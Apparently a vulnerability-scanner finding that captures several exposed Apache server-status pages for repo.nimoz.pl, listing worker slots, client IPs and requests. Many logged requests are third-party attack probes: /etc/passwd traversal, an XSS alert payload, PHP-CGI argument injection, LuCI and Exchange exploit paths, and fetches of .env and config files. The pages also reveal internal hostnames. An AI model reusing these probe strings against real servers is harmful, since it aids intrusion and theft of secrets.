0-88-0/0/746. 0.0085423292092840.00.008.22 62.210.101.204http/1.1repo.nimoz.pl:443GET /index.php/login HTTP/1.1 1-86-0/0/412. 0.00258221202200820.00.002.88 171.241.53.222http/1.1 1-86-0/0/362. 0.0025822101837140.00.002.87 185.191.126.213http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-86-0/0/423. 0.0025822102004090.00.003.43 109.176.11.236http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-86-0/0/384. 0.0025822112200800.00.002.86 164.52.24.188http/1.1 1-86-0/0/404. 0.0025822102059910.00.006.40 185.16.39.118http/1.1vm-repo-prd.nimoz.local:80done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-86-0/0/401. 0.002582215652585530.00.003.74 78.153.140.151http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-86-0/0/402. 0.0025822101984680.00.003.50 83.222.190.54http/1.1 1-86-0/0/438. 0.00258221322019390.00.003.47 51.158.171.29http/1.1 1-86-0/0/395. 0.0025822101832180.00.002.72 87.236.176.59h2repo.nimoz.pl:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-86-0/0/401. 0.00258221332111120.00.003.62 85.105.20.153http/1.1repo.nimoz.pl:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-86-0/0/428. 0.0025822101893960.00.003.47 87.236.176.148h2repo.nimoz.pl:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-86-0/0/403. 0.002582211192065570.00.002.86 78.153.140.151http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-86-0/0/414. 0.00258221252415840.00.004.06 78.153.140.151http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-86-0/0/445. 0.00258221221994560.00.003.61 109.160.97.236http/1.1 1-86-0/0/424. 0.0025822102403020.00.002.93 80.82.77.202http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 1-86-0/0/430. 0.0025822101832160.00.003.34 78.153.140.151http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-86-0/0/399. 0.0025822102030450.00.002.83 149.50.103.48http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-86-0/0/409. 0.00258221261754570.00.003.25 185.242.226.7http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-86-0/0/430. 0.0025822101988260.00.003.11 193.77.238.11http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-86-0/0/423. 0.0025822101938000.00.003.55 87.236.176.101http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-86-0/0/413. 0.0025822101927100.00.002.90 109.160.97.236http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-86-0/0/413. 0.00258221211829330.00.003.07 194.165.16.76http/1.1vm-repo-prd.nimoz.local:80\x03 1-86-0/0/399. 0.0025822102102840.00.003.02 83.222.190.54http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 1-86-0/0/428. 0.00258221292026200.00.004.87 109.176.11.236http/1.1 1-86-0/0/383. 0.00258221271866060.00.002.78 78.153.140.151http/1.1repo.nimoz.pl:443GET / HTTP/1.0 2-86<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe448f047a4e3
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Sunday, 15-Sep-2024 23:46:54 CEST Restart Time: Thursday, 20-Jun-2024 12:33:08 CEST Parent Server Config. Generation: 88 Parent Server MPM Generation: 87 Server uptime: 87 days 11 hours 13 minutes 45 seconds Server load: 0.00 0.00 0.00 Total accesses: 70093 - Total Traffic: 503.8 MB - Total Duration: 25509871 CPU Usage: u66.08 s107.95 cu278.45 cs19.5 - .00625% CPU load .00927 requests/sec - 69 B/second - 7.4 kB/request - 363.943 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 215904no (old gen)0yes025000 720035no0yes025000 820036no0yes124000 Sum300 174000 ..................................................______________ ___________..................................................... ......................__________________________________________ _______W Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-86-0/0/672. 0.00856094692131770.00.005.69 62.210.101.12http/1.1repo.nimoz.pl:443GET /api/users/admin/check HTTP/1.1 0-86-0/0/674. 0.008560911962046950.00.004.62 78.153.140.151http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-86-0/0/669. 0.00856094351899600.00.004.99 62.210.101.12http/1.1repo.nimoz.pl:443GET /dana-na/ HTTP/1.1 0-86-0/0/698. 0.00856094282105110.00.004.45 78.153.140.151http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-86-0/0/713. 0.008560911801988620.00.004.44 62.210.101.12http/1.1repo.nimoz.pl:443GET /bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click 0-86-0/0/640. 0.00856092462346800.00.004.34 62.210.101.12http/1.1repo.nimoz.pl:443GET /user HTTP/1.1 0-86-0/0/651. 0.00856094322167670.00.004.09 78.153.140.151http/1.1 0-86-0/0/705. 0.00856095522111980.00.005.56 62.210.101.12http/1.1repo.nimoz.pl:443GET /webshell4/login.php?login=%22%3E%3Cscript%3Ealert%28docume 0-86-0/0/736. 0.008560901965750.00.004.18 62.210.101.12http/1.1repo.nimoz.pl:443GET /../../../../../../../../etc/passwd HTTP/1.1 0-86-0/0/630. 0.008560913822031990.00.003.76 78.153.140.151http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-86-0/0/682. 0.00856099572597650.00.006.40 62.210.101.12http/1.1repo.nimoz.pl:443POST /ui/api/v1/global-search/builds?jfLoader=true HTTP/1.1 0-86-0/0/696. 0.0085609212196870.00.003.85 78.153.140.151http/1.1repo.nimoz.pl:443GET /backend/.env HTTP/1.1 0-86-0/0/661. 0.00856097141978430.00.004.46 62.210.101.12http/1.1repo.nimoz.pl:443GET //index.php?redirect=true&meth=ajax HTTP/1.1 0-86-0/0/677. 0.00856098091964000.00.005.99 62.210.101.12http/1.1repo.nimoz.pl:443GET /htdocs/index.php/cmd.php?cmd=template_engine&dn=%27%22()%2 0-86-0/0/660. 0.00856095912028160.00.003.56 62.210.101.12http/1.1repo.nimoz.pl:443GET /phpmyadmin/index.php HTTP/1.1 0-86-0/0/697. 0.00856093351879770.00.004.23 159.65.6.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-86-0/0/696. 0.00856092562032610.00.004.95 62.210.101.12http/1.1repo.nimoz.pl:443POST /service/v4_1/rest.php HTTP/1.1 0-86-0/0/675. 0.008560902493340.00.007.13 78.153.140.151http/1.1repo.nimoz.pl:443GET /app_dev.php/_profiler/phpinfo HTTP/1.1 0-86-0/0/641. 0.00856094701967690.00.003.58 62.210.101.12http/1.1repo.nimoz.pl:443GET /pma/index.php HTTP/1.1 0-86-0/0/672. 0.00856093632097080.00.003.85 62.210.101.12http/1.1repo.nimoz.pl:443POST /spre/auth/login HTTP/1.1 0-86-0/0/666. 0.00856092772719370.00.004.10 62.210.101.12http/1.1repo.nimoz.pl:443GET /.well-known/acme-challenge/../../admin/diagnostic.jsp HTTP 0-86-0/0/667. 0.00856096312242680.00.004.90 78.153.140.151http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-86-0/0/634. 0.008560910322188820.00.003.66 62.210.101.12http/1.1repo.nimoz.pl:443GET /bitrix/redirect.php?site_id=s1&event1=select_product_t1&ev 0-86-0/0/652. 0.00856094502014870.00.004.02 62.210.101.12http/1.1repo.nimoz.pl:443GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1 0-86-0/0/688. 0.0085609222075780.00.008.10 78.153.140.151http/1.1repo.nimoz.pl:443GET /.json HTTP/1.1 1-86-0/0/412. 0.0085609202200820.00.002.88 171.241.53.222http/1.1 1-86-0/0/362. 0.008560901837140.00.002.87 185.191.126.213http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-86-0/0/423. 0.008560902004090.00.003.43 109.176.11.236http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-86-0/0/384. 0.008560912200800.00.002.86 164.52.24.188http/1.1 1-86-0/0/404. 0.008560902059910.00.006.40 185.16.39.118http/1.1vm-repo-prd.nimoz.local:80done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-86-0/0/401. 0.00856095652585530.00.003.74 78.153.140.151http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-86-0/0/402. 0.008560901984680.00.003.50 83.222.190.54http/1.1 1-86-0/0/438. 0.0085609322019390.00.003.47 51.158.171.29http/1.1 1-86-0/0/395. 0.008560901832180.00.002.72 87.236.176.59h2repo.nimoz.pl:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-86-0/0/401. 0.0085609332111120.00.003.62 85.105.20.153http/1.1repo.nimoz.pl:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-86-0/0/428. 0.008560901893960.00.003.47 87.236.176.148h2repo.nimoz.pl:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-86-0/0/403. 0.00856091192065570.00.002.86 78.153.140.151http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-86-0/0/414. 0.0085609252415840.00.004.06 78.153.140.151http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-86-0/0/445. 0.0085609221994560.00.003.61 109.160.97.236http/1.1 1-86-0/0/424. 0.008560902403020.00.002.93 80.82.77.202http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 1-86-0/0/430. 0.008560901832160.00.003.34 78.153.140.151http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-86-0/0/399. 0.008560902030450.00.002.83 149.50.103.48http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-86-0/0/409. 0.0085609261754570.00.003.25 185.242.226.7http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-86-0/0/430. 0.008560901988260.00.003.11 193.77.238.11http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-86-0/0/423. 0.008560901938000.00.003.55 87.236.176.101http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-86-0/0/413. 0.008560901927100.00.002.90 109.160.97.236http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-86-0/0/413. 0.0085609211829330.00.003.07 194.165.16.76http/1.1vm-repo-prd.nimoz.local:80\x03 1-86-0/0/399. 0.008560902102840.00.003.02 83.222.190.54http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 1-86-0/0/428. 0.0085609292026200.00.004.87 109.176.11.236http/1.1 1-86-0/0/383. 0.0085609271866060.00.002.78 78.153.140.151http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe44850639bd7
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Saturday, 14-Sep-2024 00:44:42 CEST Restart Time: Thursday, 20-Jun-2024 12:33:08 CEST Parent Server Config. Generation: 87 Parent Server MPM Generation: 86 Server uptime: 85 days 12 hours 11 minutes 33 seconds Server load: 0.00 0.00 0.00 Total accesses: 41522 - Total Traffic: 277.8 MB - Total Duration: 9869253 CPU Usage: u43.12 s103.74 cu210.86 cs16.06 - .00506% CPU load .00562 requests/sec - 39 B/second - 6.9 kB/request - 237.687 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 015903no0yes025000 215904no1yes124000 Sum201 149000 _________________________.........................________W_____ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-86159030/1/596_ 0.050241129420.00.014.43 96.126.110.181http/1.1repo.nimoz.pl:443GET /debug/default/view?panel=config HTTP/1.1 0-86159030/0/574_ 0.004251066290.00.003.70 96.126.110.181h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-86159030/0/566_ 0.00259501004090.00.004.10 45.79.169.18http/1.1 0-86159030/0/609_ 0.00001117800.00.003.57 178.211.139.188http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-86159030/1/620_ 0.014251053430.00.013.59 96.126.110.181http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-86159030/0/537_ 0.0012701123940.00.003.39 205.210.31.181http/1.1 0-86159030/0/553_ 0.00201206900.00.003.16 96.126.110.181h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-86159030/0/616_ 0.00201186520.00.004.75 96.126.110.181http/1.1 0-86159030/1/635_ 0.0013201110830.00.003.30 149.50.103.48http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-86159030/0/544_ 0.000261059290.00.002.99 141.255.160.234http/1.1 0-86159030/1/583_ 0.052171704560.00.025.41 96.126.110.181http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-86159030/0/597_ 0.00301127180.00.002.95 96.126.110.181h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-86159030/1/562_ 0.051211062830.00.013.52 96.126.110.181http/1.1repo.nimoz.pl:443GET /.vscode/sftp.json HTTP/1.1 0-86159030/0/587_ 0.0030938060.00.004.68 96.126.110.181http/1.1 0-86159030/0/564_ 0.00259501191100.00.002.68 196.117.235.228http/1.1vm-repo-prd.nimoz.local:80GET /.env HTTP/1.1 0-86159030/0/597_ 0.00401046220.00.003.35 178.62.223.247http/1.1 0-86159030/1/594_ 0.060171162050.00.013.47 96.126.110.181http/1.1repo.nimoz.pl:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-86159030/1/565_ 0.00143501356910.00.006.16 46.174.191.30http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 0-86159030/0/549_ 0.00201011670.00.002.71 178.62.223.247h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-86159030/0/576_ 0.00143501118040.00.002.94 178.62.223.247http/1.1 0-86159030/1/559_ 0.00260001256370.00.003.16 185.191.126.213http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-86159030/0/583_ 0.003241131060.00.004.11 96.126.110.181http/1.1 0-86159030/0/537_ 0.0012601280760.00.002.80 45.148.10.242http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale HTTP/1.1 0-86159030/0/559_ 0.002677301034530.00.003.15 143.244.173.162http/1.1repo.nimoz.pl:443GET /ipanel/login.php HTTP/1.1 0-86159030/0/594_ 0.00301146590.00.007.19 96.126.110.181http/1.1 1-81-0/0/194. 0.003482740599430.00.001.19 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-81-0/0/178. 0.003482740484890.00.001.62 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-81-0/0/198. 0.003482740559810.00.001.67 80.82.77.202http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 1-81-0/0/180. 0.003482740643870.00.001.33 149.129.248.52http/1.1 1-81-0/0/191. 0.003482740680220.00.004.74 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-81-0/0/194. 0.003482740791820.00.002.01 8.216.89.236http/1.1repo.nimoz.pl:443POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e 1-81-0/0/192. 0.003482740596930.00.001.86 45.148.10.242http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale HTTP/1.1 1-81-0/0/215. 0.0034827427495200.00.001.74 45.148.10.242http/1.1 1-81-0/0/184. 0.003482740484030.00.001.13 185.224.128.59http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale HTTP/1.1 1-81-0/0/223. 0.003482740494690.00.002.18 45.148.10.242http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale HTTP/1.1 1-81-0/0/204. 0.003482740520810.00.001.84 45.148.10.242http/1.1 1-81-0/0/173. 0.003482740488090.00.001.16 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-81-0/0/208. 0.0034827431981520.00.002.33 8.216.89.236http/1.1repo.nimoz.pl:443POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_ 1-81-0/0/226. 0.0034827425512670.00.001.93 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-81-0/0/212. 0.003482740900670.00.001.34 97.107.139.154http/1.1 1-81-0/0/207. 0.003482740490540.00.001.71 185.224.128.84http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale HTTP/1.1 1-81-0/0/182. 0.003482740514050.00.001.14 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-81-0/0/191. 0.003482740465210.00.001.60 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-81-0/0/216. 0.003482740457640.00.001.46 91.92.251.246http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01\x01\x18\x01 1-81-0/0/206. 0.003482740520410.00.001.94 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-81-0/0/198. 0.003482740512610.00.001.25 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-81-0/0/197. 0.003482740499010.00.001.38 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-81-0/0/204. 0.003482740486980.00.001.46 185.224.128.47http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-81-0/0/209. 0.003482740519520.00.003.26 185.224.128.187http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale HTTP/1.1 1-81-0/0/186. 0.003482740495440.00.001.20 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 2-86159040/0/475_ 0.0020737800.00.003.76 96.126.110.181http/1.1 2-86159040/1/418_ 0.02121606750.00.012.69 96.126.110.181http/1.1repo.nimoz.pl:443GET /server HTTP/1.1 2-8615904
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe44878682332
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Sunday, 02-Jun-2024 01:52:19 CEST Restart Time: Friday, 26-Jan-2024 09:06:02 CET Parent Server Config. Generation: 129 Parent Server MPM Generation: 128 Server uptime: 127 days 15 hours 46 minutes 17 seconds Server load: 0.00 0.00 0.00 Total accesses: 43168 - Total Traffic: 750.4 GB - Total Duration: 118595257 CPU Usage: u59.32 s145.12 cu1006.98 cs689.68 - .0172% CPU load .00391 requests/sec - 71.3 kB/second - 17.8 MB/request - 2747.3 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 018389no0yes124000 118390no0yes025000 Sum200 149000 _______________W__________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-128183890/0/450_ 0.0010827930.00.00131.45 80.66.83.49http/1.1 0-128183890/0/484_ 0.00001060640.00.006.17 159.89.12.166h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-128183890/1/499_ 0.000078241420.00.00132866.38 159.89.12.166h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-128183890/0/1516_ 0.0001189851240.00.0024866.07 159.89.12.166http/1.1 0-128183890/1/471_ 0.010308767250.00.021437.83 159.89.12.166http/1.1 0-128183890/0/517_ 0.000041364740.00.002234.36 159.89.12.166http/1.1 0-128183890/1/425_ 0.041235534350.00.0134602.50 159.89.12.166http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-128183890/0/537_ 0.0052332371170.00.003141.67 57.151.49.188h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-128183890/1/478_ 0.035011685280.00.002054.23 46.174.191.29http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 0-128183890/0/500_ 0.0020704968280.00.00365.70 57.151.49.188http/1.1 0-128183890/1/480_ 0.03207023521660.00.0037040.73 205.210.31.85http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 0-128183890/0/444_ 0.00312253986600.00.00348.54 87.121.69.52http/1.1 0-128183890/0/500_ 0.00312039212120.00.0059395.25 134.209.31.194http/1.1 0-128183890/0/478_ 0.0035601489170.00.0061.48 101.36.123.67http/1.1repo.nimoz.pl:443GET /core/js/backgroundjobs.js?v=c03a1674-3 HTTP/1.1 0-128183890/0/476_ 0.00357028239940.00.001477.14 168.76.20.229http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-128183890/0/468W 0.00004518870.00.002566.06 159.89.12.166http/1.1repo.nimoz.pl:443GET /server-status HTTP/1.1 0-128183890/1/451_ 0.090176567360.00.01541.85 159.89.12.166http/1.1repo.nimoz.pl:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-128183890/0/466_ 0.000192501850.00.00442.64 147.185.132.166http/1.1 0-128183890/2/497_ 0.0801748400920.00.012663.92 159.89.12.166http/1.1repo.nimoz.pl:443GET /debug/default/view?panel=config HTTP/1.1 0-128183890/2/736_ 0.0802214035510.00.027256.48 159.89.12.166http/1.1repo.nimoz.pl:443GET /about HTTP/1.1 0-128183890/1/507_ 0.0802015013930.00.01133763.80 159.89.12.166http/1.1repo.nimoz.pl:443GET /.vscode/sftp.json HTTP/1.1 0-128183890/1/529_ 0.01002913470.00.00411.09 87.236.176.38http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-128183890/1/461_ 0.0802121872070.00.02115446.15 159.89.12.166http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-128183890/0/436_ 0.00006868020.00.0063975.02 159.89.12.166http/1.1 0-128183890/1/519_ 0.010025449290.00.002800.37 159.89.12.166h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-128183900/0/172_ 0.00673541371660.00.002.62 57.151.49.188http/1.1 1-128183900/0/160_ 0.00673524144960.00.001.65 179.43.185.130http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-128183900/0/134_ 0.00673520174970.00.005.20 167.71.41.198http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-128183900/0/209_ 0.00673522412760.00.003.77 101.36.123.67http/1.1repo.nimoz.pl:443GET /sitemap.xml HTTP/1.1 1-128183900/0/1913_ 0.0067351962216400.00.0028259.24 51.8.81.143http/1.1repo.nimoz.pl:443POST / HTTP/1.1 1-128183900/0/164_ 0.006735232877560.00.002.10 168.76.20.229http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-128183900/0/142_ 0.00673519166900.00.002.17 101.36.123.67http/1.1repo.nimoz.pl:443GET /axis2/axis2-admin/ HTTP/1.1 1-128183900/0/151_ 0.00673529443500.00.0067.44 3.90.115.5http/1.1 1-128183900/0/142_ 0.006735253680420.00.00346.51 143.198.55.87http/1.1 1-128183900/0/188_ 0.006735951259960.00.003.37 101.36.123.67http/1.1repo.nimoz.pl:443GET /core/js/dist/main.js?v=c03a1674-3 HTTP/1.1 1-128183900/0/137_ 0.00673524475250.00.0077.01 101.36.123.67http/1.1repo.nimoz.pl:443GET /index.php/js/core/merged-template-prepend.js?v=c03a1674-3 1-128183900/0/179_ 0.00673524757320.00.0060.08 101.36.123.67http/1.1repo.nimoz.pl:443GET /sitemap.xml HTTP/1.1 1-128183900/0/157_ 0.0000253120.00.002.49 51.222.82.223http/1.1vm-repo-prd.nimoz.local:80GET /message-api/actuator/env HTTP/1.1 1-128183900/1/158_ 0.05023236650.00.011.75 159.89.12.166http/1.1repo.nimoz.pl:443GET /v2/_catalog HTTP/1.1 1-128183900/1/151_ 0.050233617480.00.01345.99 159.89.12.166http/1.1repo.nimoz.pl:443GET /server HTTP/1.1 1-128183900/0/129_ 0.0001423220.00.0086.85 159.89.12.166http/1.1 1-128183900/0/202_ 0.0000333840.00.002.68 159.89.12.166h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-128183900/0/171_ 0.00008031940.00.00896.84 159.89.12.166h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-128183900/0/150_ 0.0095226190770.00.001.70 179.43.185.130http/1.1vm-repo-prd.nimoz.local:80done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-128183900/0/154_ 0.009520156950.00.001.56 143.198.55.87http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-128183900/1/182_ 0.0295205280950.00.00427.00 87.236.176.100h2repo.nimoz.pl:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-128183900/0/193_ 0.00953041343560.00.002038.19 143.198.55.87http/1.1vm-repo-prd.nimoz.local:80GET /geoip/ HTTP/1.1 1-128183900/1/163_ 0.0195329142290.00.011.44 87.236.176.38http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-128183900/0/259_ 0.004243022038510.00.002891.42 57.151.49.188h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-128183900/0/178_ 0.0042430836500.00.0081.33 80.66.83.49http/1.1 2-126-0/0/834. 0.0093135018051050.00.00903.55 128.199.182.152http/1.1 2-126-0/0/704. 0.0093135023137270.00.006317.58 </
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe4484890ecea
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Saturday, 01-Jun-2024 15:03:50 CEST Restart Time: Friday, 26-Jan-2024 09:06:02 CET Parent Server Config. Generation: 128 Parent Server MPM Generation: 127 Server uptime: 127 days 4 hours 57 minutes 48 seconds Server load: 0.00 0.00 0.00 Total accesses: 43074 - Total Traffic: 750.4 GB - Total Duration: 118593425 CPU Usage: u60.07 s144.67 cu1005.43 cs689.58 - .0173% CPU load .00392 requests/sec - 71.6 kB/second - 17.8 MB/request - 2753.25 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 015389no0yes025000 115390no0yes124000 Sum200 149000 ________________________________________W_________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-127153890/4/447_ 0.78129827680.00.03131.44 64.226.78.121http/1.1 0-127153890/1/483_ 0.25001060640.00.006.17 64.226.78.121h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-127153890/2/495_ 0.4602878241350.00.01132866.33 179.43.185.130http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 0-127153890/3/1513_ 0.8213990189851050.00.0224866.04 45.86.86.249http/1.1vm-repo-prd.nimoz.local:80GET /?%3Cplay%3Ewithme%3C/%3E HTTP/1.1 0-127153890/3/466_ 0.78008766680.00.001437.80 64.226.78.121http/1.1 0-127153890/3/517_ 0.791041364740.00.012234.36 64.226.78.121h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-127153890/2/421_ 0.49105533820.00.0134602.48 157.230.30.241h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-127153890/3/536_ 0.8701932370930.00.043141.66 64.226.78.121http/1.1repo.nimoz.pl:443GET /server HTTP/1.1 0-127153890/3/472_ 0.821399011684770.00.022054.20 45.86.86.249http/1.1vm-repo-prd.nimoz.local:80POST / HTTP/1.1 0-127153890/5/499_ 0.880204968280.00.04365.70 64.226.78.121http/1.1repo.nimoz.pl:443GET /debug/default/view?panel=config HTTP/1.1 0-127153890/3/477_ 0.8701723521410.00.0337040.72 64.226.78.121http/1.1repo.nimoz.pl:443GET /.vscode/sftp.json HTTP/1.1 0-127153890/3/443_ 0.771253986350.00.02348.52 64.226.78.121http/1.1 0-127153890/1/500_ 0.06714039212120.00.0059395.25 185.89.67.36http/1.1 0-127153890/3/477_ 0.78139401489170.00.0361.48 179.43.185.130http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 0-127153890/2/474_ 0.4713942428239660.00.011477.12 184.105.139.67h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-127153890/3/465_ 0.24139404518660.00.002566.05 184.105.139.67h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-127153890/4/448_ 0.880226567190.00.04541.84 64.226.78.121http/1.1repo.nimoz.pl:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 